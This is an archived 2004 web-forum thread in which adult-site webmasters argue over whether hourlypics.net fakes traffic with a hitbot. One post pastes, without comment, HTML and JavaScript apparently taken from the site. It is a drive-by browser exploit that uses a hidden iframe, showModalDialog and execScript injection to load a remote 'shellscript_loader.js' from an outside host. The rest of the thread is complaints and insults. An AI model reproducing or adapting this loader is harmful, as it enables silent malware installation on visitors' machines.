View Full Version : hourlypics.net is a big Cheater !!!
pornhit
08-05-2004, 06:46 PM
Hi,
This is a big cheater.
http://www.hourlypics.net
Probably he use hitbot...or something like that...Check it !
Darius
08-05-2004, 11:39 PM
Hmm . . .
Don't know anything about a hitbot, I'm not trading with that site. But going there sure set off my antivirus and firewalls with a bunch of trojans and exploits like Download.Ject and bloodhound.
What a stupid asshole.
pornhit
08-06-2004, 12:34 AM
Originally posted by Darius
Hmm . . .
Don't know anything about a hitbot, I'm not trading with that site. But going there sure set off my antivirus and firewalls with a bunch of trojans and exploits like Download.Ject and bloodhound.
What a stupid asshole. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0052)http://www.myexexex.com/gogogo/aid1/md/installer.htm -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=Javascript>
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="java script:'<SCRIPT SRC=\'http://www.myexexex.com/gogogo/aid1/md/shellscript_loader.js\'><\/script>'";
}
</SCRIPT>
<SCRIPT language=javascript>
setTimeout("myiframe.execScript(InjectedDuringRedirection.toSt ring())",1000);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",1001);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=200 HEIGHT=200></IFRAME>');
</SCRIPT>
</BODY></HTML>
pornhit
08-06-2004, 12:38 AM
You are very stupid !
He set up and force 500 hits hourly.
I am selling traffic with my site, and in my stat I saw that I have hourly 500 traffic, but I didn't sell any traffic.
So, it is a big CHEATER.
Don't trade with that site !!!:cussing:
Darius
08-06-2004, 04:11 PM
??? pornhit
Here is a few thoughts for you.
1) In your first post you didn't give any info other than to say that guy was a cheat..
2) I said I couldn't confirm that based on a visit to the guys site. But I did comment on the rotten things he was doing to any poor surfer that went there.
3) No way in hell I would trade with a site that does crap like that to the surfers. ( thanks for pointing them out)
4) I said HE was a stupid asshole not you.
Why are you calling me stupid?
Leviathan
08-07-2004, 12:45 AM
Yes, he is a real-hitbotter.. I dont want to tell whats wrong he is doing cause he'll fix that :mad: Just check all his trade params carefully and you'll see if he is.
vBulletin® v3.7.3, Copyright ©2000-2012, Jelsoft Enterprises Ltd.